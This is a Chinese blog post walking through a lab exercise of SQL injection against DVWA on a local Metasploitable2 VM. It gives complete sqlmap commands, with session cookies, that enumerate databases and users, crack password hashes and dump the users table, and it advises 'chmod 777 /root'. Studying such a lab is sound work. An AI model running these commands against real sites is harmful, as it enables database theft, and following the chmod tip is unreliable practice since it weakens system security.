SQL注入部分:DVWA+SQLmap+Mysql注入实战

最新推荐文章于 2024-05-13 10:41:08 发布
最新推荐文章于 2024-05-13 10:41:08 发布
阅读量310 收藏 3
点赞数
分类专栏: 安全工具 实验 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llsnb666/article/details/110006441
版权

文章目录

实验准备

kali虚拟机,Metasploitable2虚拟机。

实验环境搭建。启动Metasploitable2虚拟机。

环境准备

环境准备:1.登录Metasploitable2的IP/dvwa/login.php ,将安全级别设置为最低;

2.在kali中的火狐浏览器下载TamperData插件,等待获取cookies值
需要cookies时才打开该插件

3.在【SQL Injection】项中,提交User ID为22(地址栏出现id=22,这就是MySQL的注入点)
在这里插入图片描述
然后获得URL 获得注入点:http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#
,并点OK
在这里插入图片描述
获得cookie
security=low;PHPSESSID=90660b40afc8b6a221aa54d6f79e7648

1、注入点发现。首先肯定是要判断是否有注入漏洞

在kali打开dvwa界面
靶机IP/dvwa/login.php
如何获取账号密码可以参照我另一篇博客
NMAP使用
在输入框输入1,返回
返回正常;
在这里插入图片描述
再次输入1’,报错,返回在这里插入图片描述
此时可以断定有SQL注入漏洞,
下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;
在这里插入图片描述

2、枚举当前使用的数据库名称和用户名


• -u :指定目标URL,即注入点
• --cookies:当前会话的cookies值
• -b:获取数据库类型,检索数据库管理系统标识
• --current-db:获取当前数据库
• --current-user:获取当前登录数据库使用的用户
在kali输入的命令:
sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ -b --current-db --current-user
得到如图在这里插入图片描述

3、枚举数据库用户名和密码

-string :当查询可用时用来匹配页面中的字符串
–users:枚举数据库用户名
-password:枚举数据库用户的密码(hash)

我输入的命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” --users --password
在这里插入图片描述
说明:选择目录下字典文件,暴力破解
安装弹出的提示选择字典破解
在这里插入图片描述
可以看到我的三个用户都没有密码

4、枚举数据库

• --dbs:枚举当前数据库
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” --dbs 这个是查看mysql数据库
在这里插入图片描述

5、枚举数据库和指定数据库的数据表

-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ -D dvwa --tables 这个是查看dvwa的数据库
在这里插入图片描述

6、获取指定数据库和表中所有列的信息

• -D:指定的数据库
• -T:指定数据库中的数据表
• --columns:获取列的信息
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” -D dvwa -T users --columns
在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。

-C:枚举数据表中的列
–dump:存储数据表项
命令:sqlmap -u “http://192.168.62.129/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low; PHPSESSID=90660b40afc8b6a221aa54d6f79e7648’ --string=“Surname” -D dvwa -T users -C user,password --dump在这里插入图片描述
在这里插入图片描述

查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)
打开控制台,切换ROOT用户输入su,输入密码,然后输入以下命令:
chmod 777 /root
然后就可以正常打开需要权限的root文件夹了。
在这里插入图片描述
在这里插入图片描述
完成!

1900301222-a0
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
复现awvs——XSS(反射型)漏洞
记录并分享学习安全的知识点..
12-29 2921
1.首先通过awvs对网站进行扫描如下: 2. 判断为xss反射型漏洞,然后打开目标网站,首先先找到变量ref 3.可以看出被隐藏了,将type值改为text文本框,进行复现
DVWA下载、安装、使用(漏洞测试环境搭建)教程
热门推荐
星如雨落
10-27 4万+
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入、SQL盲注、弱会话ID、XSS漏洞(DOM型跨站脚本、反射型跨站脚本、 存储型跨站脚本) 环境搭建 由于是本地搭建真实web漏洞网站,我就以Windows
【渗透测试】 sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap
最新发布
2401_84968269的博客
05-13 872
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA靶场教程
wxh的博客
01-15 2万+
Burt Force(暴力破解)
DWVA XSS(DOM型)
weixin_44023403的博客
12-27 526
DWVA XSS(DOM型)XSSXSS (DOM型)lowMediumHigh XSS XSS的实质其实是HTML代码与Javscript代码的注入。但由于XSS的攻击对象是与客户对等的Browser端,因此常常不被开发者所重视。 一般意义上的XSS通常可以用简单的方法检测出来:当用户输入某个参数的全部或其部分,原封不动地在源代码里出现时,我们就可以认为这个参数存在XSS漏洞。 XSS (DOM型) DOM XSS的产生并没有和后台服务器产生交互,而是通过浏览器的dom树解析产生的。 low 源码
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1867
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序安全漏洞,使得攻击者可以将恶意的代码注入到网页,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验,我们将深入理解SQL注入的盲注类型,并...
学习之sql注入漏洞网址的创建
06-06
3. 修改dvwa源码:找到与SQL注入相关的页面,如dvwa/vulnerabilities/sqli-literal/,修改其查询代码,增加易受攻击的点。 4. 验证注入:在浏览器输入修改后的URL,尝试输入SQL注入语句,观察是否能得到预期的结果...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
SQL注入漏洞与SQLmap工具】 SQL注入是一种常见的网络安全漏洞,攻击者通过在Web表单插入恶意SQL语句,欺骗服务器执行非预期的数据库操作。这种漏洞可能导致数据泄露、非法权限获取,甚至整个数据库系统的瘫痪。...
Web应用安全Sqlmap用法介绍.pptx
06-20
2. **探测SQL注入漏洞**:在命令行,运行`python sqlmap.py -u "URL" --cookie="cookie" --batch`,如果存在SQL注入sqlmap会识别出DBMS(如MySQL)的漏洞。 3. **查询数据库信息**:使用`python sqlmap.py -u ...
防xss攻击和sql注入
03-19
防xss攻击和sql注入
预防XSS攻击和SQL注入XssFilter
07-23
一、什么是XSS攻击 XSS是一种经常出现在web应用的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”。 二、XSS漏洞的危害 (1)网络钓鱼,包括盗取各类用户账号; (2)窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; (3)劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; (4)强制弹出广告页面、刷流量等; (5)网页挂马; (6)进行恶意操作,例如任意篡改页面信息、删除文章等; (7)进行大量的客户端攻击,如DDoS攻击; (8)获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; (9)控制受害者机器向其他网站发起攻击; (10)结合其他漏洞,如CSRF漏洞,实施进一步作恶; (11)提升用户权限,包括进一步渗透网站; (12)传播跨站脚本蠕虫等; 三、过滤器配置 web.xml配置 XssFilter com.xxx.Filter.XssFilter XssFilter /*
DVWA简介及安装
qq_54727885的博客
11-26 7918
DVWA简介: DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA 一共包含了十个攻击模块,分别是:Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、- File Inclusion(文件包含)、File Upload(文件上传)、Ins
web漏洞扫描之AWVS
m0_55854679的博客
12-27 7413
文章目录简介开启扫描测试AWVS忘记了密码? 简介 本篇文章是在基于kali安装,windows安装awvs可以参照此博客 AWVS是一个自动化的web漏洞扫描工具,它可以扫描任何通过web浏览器访问和遵循HTTP/HTTPS规则的web站点。 AWVS原理是基于漏洞匹配方法,通过网络爬虫测试你的网站安全,检测流行安全漏洞。 AWVS可以通过SQL注入、XSS、目录遍历、代码执行等漏洞来审核web应用程序的安全性并输出扫描报告。相对于手动测试的复杂和耗时,它能快速的发现漏洞来提高效率和漏洞覆盖面。
菜鸟日记之awvs扫描器扫描web漏洞
Blazar_star的博客
10-31 2287
立个flag,这个月跟着实验吧做实验掌握基础。 ---- ------------今天的分割线------- ---- ------------- 今天是10月30号星期二。从昨天得知实验吧这个平台,到昨晚的梦里都是关于网络安全的各种。 终于,我可以更高一层去接触和了解网络安全。谨此博客记录我与网安的这些个相识相知的日子。 -----------------今日主题awvs扫描器-----...
【渗透测试实战】具体案例——讲讲SQL注入攻击是怎么回事?
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
04-26 2459
目录 写在前面 1、 网站分析 2、初步探测 3、注入sql测试 4、获取查询长度 5、获取数据库相关信息 6、通过注入,我们拿到了数据库的初步信息 写在前面 作为一个防御型小白帽 你一定要知道进攻套路 才能有相应的防御措施 声明:只做测试,发现对方的漏洞,并不进行破坏性操作 1、 网站分析 地址:http://www.xxx.com.tw/ 这是一家国TW地区的网站,看着满屏的繁体字,就不是很舒服 网站首页包括:关于我们、资料下载、联络方式等等。 ...
Kali网络渗透测试实验三——XSS和SQL注入
qq_45746876的博客
11-24 3334
XSS和SQL注入前言实验目的系统环境:Kali Linux 2、Windows ServerXSS部分:利用Beef劫持被攻击者客户端浏览器实验环境搭建1.利用AWVS扫描留言簿网站,发现其存在XSS漏洞2.Kali使用beef生成恶意代码3.访问http://留言簿网站,将恶意代码写入网站留言板4.管理员登录login.htm,账号密码均为admin,审核用户留言5.回答问题SQL注入部分DVWA+SQLmap+Mysql注入实战sqlmap语法参考1.注入点发现2.枚举当前使用的数据库名称和用户名3
2022渗透测试-推荐一款漏洞扫描工具-AWVS安装与使用
保持微笑的博客
02-10 1万+
目录 AWVS简介 AWVS功能介绍 AWVS的安装 AWVS的使用 AWVS简介 AWVS是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何小型和大型企业的内联网、外延网和面向客户、雇员、厂商和其它人员的Web网站。AWVS可以通过检查SQL注入攻击漏洞、XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。 AWVS功能介绍 WebScanner :核心功能,web安全漏洞.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值